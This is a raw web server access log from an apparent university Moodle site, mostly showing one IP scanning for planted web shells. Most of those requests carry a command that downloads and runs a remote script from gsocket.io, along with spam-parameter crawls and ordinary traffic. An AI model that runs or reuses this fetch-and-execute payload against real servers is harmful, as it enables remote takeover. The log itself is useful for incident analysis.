68.183.183.85 - - [14/Apr/2025:13:34:55 +0300] "GET /all/modules/views-7.x-3.24/views/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:00 +0300] "GET /modules/drupal_rce/drupal_rce/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:10 +0300] "GET /blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:13 +0300] "GET /moodle/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:25 +0300] "GET /aulavirtual/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:54 +0300] "GET /?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 0 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:35:58 +0300] "GET / HTTP/1.1" 500 0 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:06 +0300] "GET / HTTP/1.1" 500 0 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:12 +0300] "GET /cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:18 +0300] "GET /command.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:22 +0300] "GET /img/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:28 +0300] "GET /uploads/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:37 +0300] "GET /wp-content/uploads/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:46 +0300] "GET /wp-content/plugins/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:50 +0300] "GET /wp-admin/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:54 +0300] "GET /css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:01 +0300] "GET /js/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:05 +0300] "GET /foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:36:24 +0300] "GET /upload/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
66.249.66.18 - - [14/Apr/2025:13:36:28 +0300] "GET /site/css/index.css HTTP/1.1" 404 796 "https://distance.gluk.ac.ke/site/?pg=%E0%B8%A3%E0%B8%A7%E0%B8%A1%E0%B8%AA%E0%B8%A5%E0%B9%87%E0%B8%AD%E0%B8%95%E0%B8%97%E0%B8%B8%E0%B8%81%E0%B8%84%E0%B9%88%E0%B8%B2%E0%B8%A2%E0%B9%83%E0%B8%99%E0%B9%80%E0%B8%A7%E0%B9%87%E0%B8%9A%E0%B9%80%E0%B8%94%E0%B8%B5%E0%B8%A2%E0%B8%A7%2B%E0%B8%9D%E0%B8%B2%E0%B8%81%E0%B8%96%E0%B8%AD%E0%B8%99%2B%E0%B9%84%E0%B8%A1%E0%B9%88%E0%B8%A1%E0%B8%B5%2B%E0%B8%82%E0%B8%B1%E0%B9%89%E0%B8%99%E0%B8%95%E0%B9%88%E0%B9%8D%E0%B8%B2" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.165 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
68.183.183.85 - - [14/Apr/2025:13:36:32 +0300] "GET /wp-content/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
66.249.66.17 - - [14/Apr/2025:13:36:38 +0300] "GET /site/?pg=mm88bet+%E0%B8%97%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%82%E0%B9%89%E0%B8%B2+sbobet+%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%96%E0%B8%B7%E0%B8%AD HTTP/1.1" 200 73606 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
68.183.183.85 - - [14/Apr/2025:13:36:42 +0300] "GET /wp-content/upload/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:17 +0300] "GET /.tmb/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:27 +0300] "GET /server/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:33 +0300] "GET /upload/foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:36 +0300] "GET /files/css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:39 +0300] "GET /file/css/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:01 +0300] "GET /upload/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:04 +0300] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:13 +0300] "GET /wp-content/uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:15 +0300] "GET /wp-content/upload/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:23 +0300] "GET /wp-admin/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:29 +0300] "GET /css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:36 +0300] "GET /foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:39 +0300] "GET /img/files/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:08 +0300] "GET /img/files/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:13 +0300] "GET /files/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
66.249.66.18 - - [14/Apr/2025:13:37:16 +0300] "GET /site/?pg=%E0%B8%AA%E0%B8%A5%E0%B9%87%E0%B8%AD%E0%B8%95pg+wallet HTTP/1.1" 200 73462 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
68.183.183.85 - - [14/Apr/2025:13:37:21 +0300] "GET /tmp/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
185.191.171.8 - - [14/Apr/2025:13:37:28 +0300] "GET /course/view.php?id=568 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
68.183.183.85 - - [14/Apr/2025:13:37:30 +0300] "GET /uploads/foto/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:48 +0300] "GET /class/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:52 +0300] "GET /folders/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:37:57 +0300] "GET /img/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:08 +0300] "GET /wp-content/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:20 +0300] "GET /wp-content/plugins/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:32 +0300] "GET /js/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:39:00 +0300] "GET /uploads/foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
66.249.66.17 - - [14/Apr/2025:13:39:06 +0300] "GET /site/?pg=lnbet689 HTTP/1.1" 200 73442 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
68.183.183.85 - - [14/Apr/2025:13:39:13 +0300] "GET /file/css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:39:21 +0300] "GET /folders/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
66.249.66.17 - - [14/Apr/2025:13:40:13 +0300] "GET /site/?pg=%E0%B8%AB%E0%B8%A7%E0%B8%A2%E0%B8%A5%E0%B8%B2%E0%B8%A7%E0%B8%A1%E0%B8%B5%E0%B8%81%E0%B8%B5%E0%B9%88%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B9%80%E0%B8%A0%E0%B8%97 HTTP/1.1" 200 73576 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.17 - - [14/Apr/2025:13:43:14 +0300] "GET /site/?pg=Rpg88+Auto HTTP/1.1" 200 73480 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
68.183.183.85 - - [14/Apr/2025:13:38:42 +0300] "GET /files/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:46 +0300] "GET /.tmb/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:50 +0300] "GET /tmp/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:38:55 +0300] "GET /server/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:39:04 +0300] "GET /upload/foto/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:39:08 +0300] "GET /files/css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
68.183.183.85 - - [14/Apr/2025:13:39:19 +0300] "GET /class/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 796 "-" "python-requests/2.32.3"
85.208.96.193 - - [14/Apr/2025:13:41:45 +0300] "GET /course/view.php?id=552 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.66.18 - - [14/Apr/2025:13:46:15 +0300] "GET /site/?pg=Mbs555+Auto HTTP/1.1" 200 73420 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.7049.52 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
43.159.149.56 - - [14/Apr/2025:13:51:30 +0300] "GET / HTTP/1.1" 500 0 "http://distance.gluk.ac.ke" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
85.208.96.194 - - [14/Apr/2025:13:54:43 +0300] "GET /course/view.php?id=572 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
114.119.134.165 - - [14/Apr/2025:13:56:15 +0300] "GET /course/view.php?id=517 HTTP/1.1" 303 754 "https://distance.gluk.ac.ke/course/index.php?categoryid=281" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.134.165 - - [14/Apr/2025:13:56:17 +0300] "GET /login/index.php HTTP/1.1" 500 0 "https://distance.gluk.ac.ke/course/index.php?categoryid=281" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.250.32.37 - - [14/Apr/2025:13:57:22 +0300] "GET /.well-known/traffic-advice HTTP/1.1" 404 796 "-" "Chrome Privacy Preserving Prefetch Proxy"
72.14.201.85 - - [14/Apr/2025:13:57:22 +0300] "GET / HTTP/2" 500 0 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
105.160.77.106 - - [14/Apr/2025:14:03:02 +0300] "GET /lib/javascript.php/1724909803/lib/polyfills/polyfill.js HTTP/2" 200 60482 "https://distance.gluk.ac.ke/mod/assign/view.php?id=1138" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
105.160.77.106 - - [14/Apr/2025:14:03:02 +0300] "GET /pluginfile.php/1/theme_academi/logo/1729569950/GREAT_LAKES_UNIVERSITY_OF_KISUMU__2_-removebg-preview.png HTTP/2" 200 153745 "https://distance.gluk.ac.ke/mod/assign/view.php?id=1138" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
105.160.77.106 - - [14/Apr/2025:14:03:02 +0300] "GET /theme/styles.php/academi/1729569950_1/all HTTP/2" 200 221926 "https://distance.gluk.ac.ke/mod/assign/view.php?id=1138" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
105.160.77.106 - - [14/Apr/2025:14:03:03 +0300] "GET /pluginfile.php/1/theme_academi/footerlogo/1729569950/odel%20logo.png HTTP/2" 200 32875 "https://distance.gluk.ac.ke/mod/assign/view.php?id=1138" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
105.160.77.106 - - [14/Apr/2025:14:03:04 +0300] "GET /lib/requirejs.php/1724909803/core/first.js HTTP/2" 200 1396498 "https://distance.gluk.ac.ke/mod/assign/view.php?id=1138" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
105.160.77.106 - - [14/Apr/2025:14:03:05 +0300] "GET /lib/javascript.php/1724909803/lib/jquery/jquery-3.7.1.min.js HTTP/2" 200 30367 "https://distance.gluk.ac.ke/mod/assign/view.php?id=1138" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
105.160.77.106 - - [14/Apr/2025:14:03:06 +0300] "POST /lib/ajax/service.php?sesskey=P12kU2VE2G&info=core_courseformat_get_state HTTP/2" 200 222 "https://distance.gluk.ac.ke/mod/assign/view.php?id=1138" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
105.160.77.106 - - [14/Apr/2025:14:03:06 +0300] "GET /theme/image.php/academi/theme/1729569950/favicon HTTP/2" 200 1406 "https://distance.gluk.ac.ke/mod/assign/view.php?id=1138" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
105.160.77.106 - - [14/Apr/2025:14:03:06 +0300] "GET /lib/ajax/service-nologin.php?info=core_output_load_fontawesome_icon_system_map&cachekey=1729569950&args=%5B%7B%22index%22%3A0%2C%22methodname%22%3A%22core_output_load_fontawesome_icon_system_map%22%2C%22args%22%3A%7B%22themename%22%3A%22academi%22%7D%7D%5D HTTP/2" 200 6044 "https://distance.gluk.ac.ke/mod/assign/view.php?id=1138" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
105.160.77.106 - - [14/Apr/2025:14:03:06 +0300] "GET /pluginfile.php/3397/theme_snap/vendorjs/snap-custom-elements/snap-ce.js HTTP/2" 200 93294 "https://distance.gluk.ac.ke/mod/assign/view.php?id=1138" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
105.160.77.106 - - [14/Apr/2025:14:03:06 +0300] "POST /lib/ajax/service.php?sesskey=P12kU2VE2G&info=media_videojs_get_language HTTP/2" 200 1331 "https://distance.gluk.ac.ke/mod/assign/view.php?id=1138" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
105.160.77.106 - - [14/Apr/2025:14:03:06 +0300] "GET /lib/ajax/service-nologin.php?info=core_output_load_template_with_dependencies&cachekey=1724909803&args=%5B%7B%22index%22%3A0%2C%22methodname%22%3A%22core_output_load_template_with_dependencies%22%2C%22args%22%3A%7B%22component%22%3A%22core%22%2C%22template%22%3A%22loading%22%2C%22themename%22%3A%22academi%22%2C%22lang%22%3A%22en%22%7D%7D%5D HTTP/2" 200 165 "https://distance.gluk.ac.ke/mod/assign/view.php?id=1138" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
105.160.77.106 - - [14/Apr/2025:14:03:06 +0300] "POST /lib/ajax/service-nologin.php?info=12-method-calls&cachekey=1724909803 HTTP/2" 200 221 "https://distance.gluk.ac.ke/mod/assign/view.php?id=1138" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
105.160.77.106 - - [14/Apr/2025:14:03:07 +0300] "GET /lib/ajax/service-nologin.php?info=core_output_load_template_with_dependencies,core_output_load_template_with_dependencies,core_output_load_template_with_dependencies,core_output_load_template_with_dependencies,core_output_load_template_with_dependencies&cachekey=1724909803&args=%5B%7B%22index%22%3A0%2C%22methodname%22%3A%22core_output_load_template_with_dependencies%22%2C%22args%22%3A%7B%22component%22%3A%22core%22%2C%22template%22%3A%22modal%22%2C%22themename%22%3A%22academi%22%2C%22lang%22%3A%22en%22%7D%7D%2C%7B%22index%22%3A1%2C%22methodname%22%3A%22core_output_load_template_with_dependencies%22%2C%22args%22%3A%7B%22component%22%3A%22core%22%2C%22template%22%3A%22modal_backdrop%22%2C%22themename%22%3A%22academi%22%2C%22lang%22%3A%22en%22%7D%7D%2C%7B%22index%22%3A2%2C%22methodname%22%3A%22core_output_load_template_with_dependencies%22%2C%22args%22%3A%7B%22component%22%3A%22core%22%2C%22template%22%3A%22local%2Freactive%2Foverlay%22%2C%22themename%22%3A%22academi%22%2C%22lang%22%3A%22en%22%7D%7D%2C%7B%22index%22%3A3%2C%22methodname%22%3A%22core_output_load_template_with_dependencies%22%2C%22args%22%3A%7B%22component%22%3A%22core%22%2C%22template%22%3A%22modal_save_cancel%22%2C%22themename%22%3A%22academi%22%2C%22lang%22%3A%22en%22%7D%7D%2C%7B%22index%22%3A4%2C%22methodname%22%3A%22core_output_load_template_with_dependencies%22%2C%22args%22%3A%7B%22component%22%3A%22core%22%2C%22template%22%3A%22pix_icon_fontawesome%22%2C%22themename%22%3A%22academi%22%2C%22lang%22%3A%22en%22%7D%7D%5D HTTP/2" 200 849 "https://distance.gluk.ac.ke/mod/assign/view.php?id=1138" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
105.160.77.106 - - [14/Apr/2025:14:03:07 +0300] "GET /login/index.php HTTP/2" 500 0 "https://distance.gluk.ac.ke/mod/assign/view.php?id=1138" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
185.191.171.13 - - [14/Apr/2025:13:55:42 +0300] "GET /user/profile.php?id=114 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.195 - - [14/Apr/2025:13:58:32 +0300] "GET /user/profile.php?id=104 HTTP/1.1" 303 754 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
197.237.228.163 - - [14/Apr/2025:14:08:37 +0300] "GET / HTTP/2" 500 0 "https://lim116.truehost.cloud:2083/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
105.160.77.106 - - [14/Apr/2025:14:03:11 +0300] "GET /login/index.php HTTP/2" 500 0 "https://distance.gluk.ac.ke/mod/assign/view.php?id=1138" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"
105.160.77.106 - - [14/Apr/2025:14:03:14 +0300] "GET /login/index.php HTTP/2" 500 0 "https://distance.gluk.ac.ke/mod/assign/view.php?id=1138" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36"